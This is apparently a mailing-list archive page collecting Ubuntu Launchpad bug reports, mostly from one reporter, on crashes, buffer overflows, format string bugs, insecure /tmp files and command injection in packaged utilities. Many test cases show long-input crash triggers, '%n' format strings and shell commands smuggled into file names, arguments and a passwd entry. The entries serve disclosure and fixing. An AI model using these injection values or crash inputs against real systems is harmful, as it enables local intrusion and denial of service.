Yes, if some other program (GUI , Server side scripts , etc ...)
use a user supplied data as input to mysqld_multi command in vulnerable
operations it will be a security issue.
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to mysql-5.1
it happened in: Ubuntu 10.04.4 LTS.
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/792637
Title:
dialog Segmentation fault
To manage notifications about this bug go to:
Yes, if some other program (GUI , Server side scripts , etc ...)
use a user supplied data as input to mysqld_multi command in vulnerable
operations it will be a security issue.
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
Public bug reported:
Binary package hint: samba-doc
samba-doc/examples/scripts/eventlog/parselog.pl have format string bug .
test case :
emanuel@amd64 /tmpecho '1 1 1 %n' | perl
/usr/share/doc/samba-doc/examples/scripts/eventlog/parselog.pl
Modification of a read-only value attempted at
Public bug reported:
Binary package hint: python-ubuntuone-client
ubuntuone-client/ubuntuone/syncdaemon/fsm/fsm_draw.py create temporary
file with fixed name graph.debug under /tmp .
test case :
emanuel@emanuel-desktop:~$ export PYTHONPATH=/usr/share/xdot/
emanuel@emanuel-desktop:~$ python
Public bug reported:
Binary package hint: system-config-printer-gnome
system-config-printer/asyncpk1.py create temporary file with fixed name
foo under /tmp .
testcase :
1) run python /usr/share/system-config-printer/asyncpk1.py
2) click on Go
3) click on Get file
Result : /tmp/foo created .
Public bug reported:
Binary package hint: samba-doc
samba-doc/examples/scripts/eventlog/parselog.pl have format string bug .
test case :
emanuel@amd64 /tmpecho '1 1 1 %n' | perl
/usr/share/doc/samba-doc/examples/scripts/eventlog/parselog.pl
Modification of a read-only value attempted at
Public bug reported:
Binary package hint: vim-runtime
vim/vim73/tools/shtags.pl have format string bug .
test case :
emanuel@emanuel-desktop:~$ echo 1 '/tmp/a%n'
emanuel@emanuel-desktop:~$ /usr/share/vim/vim73/tools/shtags.pl '/tmp/a%n'
Modification of a read-only value attempted at
Public bug reported:
Binary package hint: gxmessage
displaying extremely long button causes the window manager to crash.
test case :
emanuel@emanuel-desktop:~$ gxmessage text -buttons `python -c print
'A'*115000`
(gxmessage:8096): Gdk-WARNING **: Native Windows wider or taller than 65535
Public bug reported:
Binary package hint: zenity
displaying extremely long error causes the window manager to crash.
if the keyboard doesn't respond , login in tty and run compiz .
test case :
emanuel@emanuel-desktop:~$ zenity --error --text=`python -c print 'A'*115000`
(zenity:8369):
Public bug reported:
Binary package hint: vinagre
displaying extremely long error causes the window manager to crash.
if the keyboard doesn't respond , login in tty and run compiz .
test case:
emanuel@emanuel-desktop:~$ vinagre --file=`python -c print 'A'*115000`
(vinagre:8697): Gdk-WARNING
Public bug reported:
Binary package hint: nautilus
displaying extremely long error causes the window manager to crash.
test case:
emanuel@emanuel-desktop:~$ nautilus `python -c print 'A'*10`
** Affects: nautilus (Ubuntu)
Importance: Undecided
Status: New
--
You received
Public bug reported:
Binary package hint: pitivi
displaying extremely long error causes the window manager to crash.
if the keyboard doesn't respond , login in tty and run compiz .
test case :
emanuel@emanuel-desktop:~$ pitivi `python -c print 'A'*10`
Public bug reported:
Binary package hint: gcalctool
/usr/bin/gnome-calculator crash with Segmentation fault message and
throw errors when get long input .
test case :
emanuel@emanuel-desktop:~$ gcalctool -s `python -c print 'A'*4`
gcalctool: malloc.c:3096: sYSMALLOc: Assertion `(old_top ==
Public bug reported:
Binary package hint: x11-utils
xmessage unable to handle long input and crash with X error .
test case :
1 )
emanuel@emanuel-desktop:/tmp$ /usr/bin/xmessage 'text' -buttons `python -c
print 'A'*10`
X Error of failed request: BadAlloc (insufficient resources for
Public bug reported:
Binary package hint: binfmt-support
/usr/sbin/update-binfmts crash with Segmentation fault message when he
get non valid input for display parameter (not cli\wine\jar\python2.7)
test case :
emanuel@emanuel-desktop:/tmp$ /usr/sbin/update-binfmts --display sometext
sometext
Public bug reported:
Binary package hint: x11-xserver-utils
/usr/bin/xhost crash with very long hostname parameter .
test case :
emanuel@emanuel-desktop:/tmp$ xhost SI:`python -c print 'A'*1`:`python -c
print 'A'*1`
*** glibc detected *** xhost: double free or corruption (out):
Public bug reported:
Binary package hint: dialog
dialog crash with long input to yesno and msgbox options .
test case :
1 ) dialog --yesno `python -c print 'A'*10` 50 50
2 ) dialog --msgbox `python -c print 'A'*10` 50 50
under GDB :
Starting program: /usr/bin/dialog --msgbox `python -c
Public bug reported:
Binary package hint: x11-apps
when /usr/bin/xcutsel get 83 characters or more from -selection option
it crash with buffer overflow detected.
test case :
emanuel@emanuel-desktop:/tmp$ xcutsel -selection `python -c print 'A'*1`
*** buffer overflow detected ***: xcutsel
Public bug reported:
Binary package hint: scite
there is a buffer overflow when filename parameter is more then 4096
characters .
test case :
emanuel@emanuel-desktop:~$ scite `python -c print 'A'*5000`
*** buffer overflow detected ***: scite terminated
tested on versions :
2.26 , 2.03
**
Public bug reported:
Binary package hint: gconf-editor
/usr/bin/gconf-editor crash with Segmentation fault message .
test case :
emanuel@emanuel-desktop:~$ gconf-editor /A
Segmentation fault
under GDB :
Starting program: /usr/bin/gconf-editor /A
[Thread debugging using libthread_db enabled]
mysql-client-5.1 package version : 5.1.41-3ubuntu12.10
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to mysql-5.1 in Ubuntu.
https://bugs.launchpad.net/bugs/781982
Title:
Format string bug in mysqldumpslow
--
Ubuntu-server-bugs
mysql-server-5.1 package version : 5.1.41-3ubuntu12.10
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to mysql-5.1 in Ubuntu.
https://bugs.launchpad.net/bugs/781985
Title:
Format string bugs in mysqlhotcopy
--
Ubuntu-server-bugs
Public bug reported:
Binary package hint: foo2zjs
when /usr/bin/hipercdecode get 11 characters or more from input (file or stdin)
it crash with following message :
buffer overflow detected.
test case :
emanuel@emanuel-desktop:/tmp$ echo AAA /tmp/11
emanuel@emanuel-desktop:/tmp$
*** This bug is a security vulnerability ***
Public security bug reported:
Binary package hint: foomatic-db-engine
/usr/bin/foomatic-combo-xml write data given by parameters to fixed
char[1024] with sprintf which can trigger buffer overflow .
test case :
emanuel@emanuel-desktop:/tmp$
Public bug reported:
Binary package hint: intel-gpu-tools
I get Segmentation fault when execute one of intel_upload_blit_* commands as
regular user and root .
as root the message is : (instead of Permission denied)
DRM_IOCTL_I915_GEM_APERTURE failed: Invalid argument
test case :
mysql-client-5.1 package version : 5.1.41-3ubuntu12.10
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/781982
Title:
Format string bug in mysqldumpslow
--
ubuntu-bugs mailing list
mysql-server-5.1 package version : 5.1.41-3ubuntu12.10
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/781985
Title:
Format string bugs in mysqlhotcopy
--
ubuntu-bugs mailing list
Public bug reported:
Binary package hint: intel-gpu-tools
/usr/bin/intel_bios_reader crash when get the intel_bios_reader binary
as parameter .
test case :
emanuel@emanuel-desktop:/tmp$ md5sum /usr/bin/intel_bios_reader
7277594a2b9588909844115afd36e5ee /usr/bin/intel_bios_reader
Public bug reported:
Binary package hint: xfonts-utils
/usr/bin/fonttosfnt crash with Segmentation fault message .
test case :
emanuel@emanuel-desktop:~$ fonttosfnt -o 1
/usr/share/fonts/truetype/freefont/FreeSans.ttf
Segmentation fault
under GDB :
(gdb) r -o 1
Public bug reported:
Binary package hint: xfonts-utils
/usr/bin/ucs2any crash with Segmentation fault message .
test case :
emanuel@emanuel-desktop:/tmp$ touch Z
emanuel@emanuel-desktop:/tmp$ cat 2.bdf
STARTFONT 2.1
FONT 1-ISO10646-1
emanuel@emanuel-desktop:/tmp$ ucs2any 2.bdf Z iso8859-1
No
Public bug reported:
Binary package hint: console-setup
/usr/bin/ckbcomp have command injection bug .
test case :
root@emanuel-desktop:/tmp# touch /etc/console-setup/compose.a;echo
Systeminj;#.inc /usr/share/consoletrans/a;echo Systeminj;#.acm /tmp/CKB
root@emanuel-desktop:/tmp#
Public bug reported:
Binary package hint: dolphin
/usr/bin/servicemenuinstallation have command injection bug.
in ubuntu 10.04 the file exist inside kdebase-bin package.
in ubuntu 11.04 the file exist inside dolphin package.
test case :
emanuel@emanuel-desktop:/tmp$ touch a
Public bug reported:
Binary package hint: f-spot
strace option inside /usr/bin/f-spot create temporary file with fixed
name f-spot.strace under /tmp .
test case :
emanuel@emanuel-desktop:/tmp$ f-spot --strace
emanuel@emanuel-desktop:/tmp$ ls f-spot*
f-spot.strace
the bug can be found at :
elif
fix :
system(cat , /etc/console-setup/compose.${charmap}.inc);
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/782705
Title:
command injection in ckbcomp
--
ubuntu-bugs mailing list
fix:
system(ucf , --debconf-ok , --sum-file ,
/var/lib/libxml-sax-perl/ParserDetails.ini.md5sum , $tmpfile , $file);
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/782479
Title:
command injection
Public bug reported:
Binary package hint: perl
/usr/bin/h2xs have format string bug .
test case :
root@emanuel-desktop:/tmp# chfn -f emanuel-%n emanuel
emanuel@emanuel-desktop:/tmp$ /usr/bin/h2xs wait.h
Defaulting to backwards compatibility with perl 5.10.1
If you intend this module to be
Public bug reported:
Binary package hint: mysql-server-5.1
/usr/bin/mysqld_multi have command injection bugs .
test case :
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent
/tmp/mysqld_multi_example
1 ) report option :
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi
Public bug reported:
Binary package hint: adduser
/usr/sbin/deluser have command injection bug .
testcase :
root@emanuel-desktop:/tmp# echo ;echo
SystemInj;1:x:9898:9899:,,,:/home/Sysinj:/bin/bash /etc/passwd
root@emanuel-desktop:/tmp# /usr/sbin/deluser ;echo SystemInj;1
no crontab for root
Public bug reported:
Binary package hint: psfontmgr
/usr/bin/defoma-psfont-installer have command injection bug .
test case :
emanuel@emanuel-desktop:/tmp$ touch 123 123';echo Systeminj;echo '1 #
select that file in next command
emanuel@emanuel-desktop:/tmp$ /usr/bin/defoma-psfont-installer
Public bug reported:
Binary package hint: mysql-server-5.1
/usr/bin/mysqld_multi have command injection bugs .
test case :
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent
/tmp/mysqld_multi_example
1 ) report option :
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi
Public bug reported:
Binary package hint: gstreamer0.10-plugins-base-apps
/usr/bin/gst-visualise-0.10 have command injection bug .
test case :
1) from first argument ($pipe variable):
emanuel@emanuel-desktop:/tmp$ gst-visualise-0.10 text 2/dev/null ; echo
Systeminj ; #
No configuration file
Public bug reported:
Binary package hint: libxml-sax-perl
/usr/bin/update-perl-sax-parsers have command injection bug .
test case :
emanuel@emanuel-desktop:/tmp$ /usr/bin/update-perl-sax-parsers --update --file
2/dev/null ;echo Systeminj;exit; --ucf 1
update-perl-sax-parsers: Updating overall
Public bug reported:
Binary package hint: mysql-client-5.1
/usr/bin/mysqldumpslow have format string bug .
test case :
emanuel@emanuel-desktop:/tmp$ cat /tmp/query_slow_log
# User@Host: root[ro%sot] @ localhost []
# Query_time: 20.000941 Lock_time: 0.00 Rows_sent: 1
Public bug reported:
Binary package hint: mysql-server-5.1
/usr/bin/mysqlhotcopy have format string bugs .
test case :
connect to mysql server and execute :
mysql create database test;
Query OK, 1 row affected (0.00 sec)
mysql use test;
Database changed
mysql create table `a%n%n%n%n%n%n` (id
Public bug reported:
Binary package hint: sysvinit
/usr/sbin/update-rc.d and /usr/sbin/update-rc.d-insserv scripts have
format string bug .
test case :
emanuel@emanuel-desktop /tmptouch bug%nf
emanuel@emanuel-desktop /tmpupdate-rc.d ../../tmp/bug%nf start
Modification of a read-only value
Public bug reported:
Binary package hint: adduser
/usr/sbin/deluser have format string bug .
test case :
root@emanuel-desktop:/tmp# mkdir %999s
root@emanuel-desktop:/tmp# /tmp/%999s/../../usr/sbin/deluser Bug
Integer overflow in format string for prtf at
Public bug reported:
Binary package hint: syslinux
/usr/bin/ppmtolss16 have format string bug .
test case :
emanuel@emanuel-desktop /tmpmkdir %999s
emanuel@emanuel-desktop /tmp/tmp/%999s/../../usr/bin/ppmtolss16
/home/emanuel/Download/lantern.ppm
Integer overflow in
Public bug reported:
Binary package hint: xscreensaver-data
/usr/bin/xscreensaver-text have format string bug .
test case :
emanuel@emanuel-desktop:~$ export HOME=/tmp
emanuel@emanuel-desktop:~$ echo *textMode:Format_string_%n_bug
/tmp/.xscreensaver
emanuel@emanuel-desktop:~$
Public bug reported:
Binary package hint: libkolab-perl
/usr/bin/kolab_smtpdpolicy have format string bug .
test case :
emanuel@emanuel-desktop:/tmp$ /usr/bin/kolab_smtpdpolicy -ldap Bug%n..
Modification of a read-only value attempted at /usr/bin/kolab_smtpdpolicy line
161, DATA line 353.
Public bug reported:
Binary package hint: apparmor-utils
/usr/sbin/audit and /usr/sbin/autodep and /usr/sbin/enforce have format
string bugs .
test case :
emanuel@emanuel-desktop:/tmp$ /usr/sbin/audit /tmp/%n
Modification of a read-only value attempted at /usr/sbin/audit line 122.
Public bug reported:
Binary package hint: mysql-client-5.1
/usr/bin/mysqldumpslow have format string bug .
test case :
emanuel@emanuel-desktop:/tmp$ cat /tmp/query_slow_log
# User@Host: root[ro%sot] @ localhost []
# Query_time: 20.000941 Lock_time: 0.00 Rows_sent: 1
Public bug reported:
Binary package hint: mysql-server-5.1
/usr/bin/mysqlhotcopy have format string bugs .
test case :
connect to mysql server and execute :
mysql create database test;
Query OK, 1 row affected (0.00 sec)
mysql use test;
Database changed
mysql create table `a%n%n%n%n%n%n` (id
53 matches
Mail list logo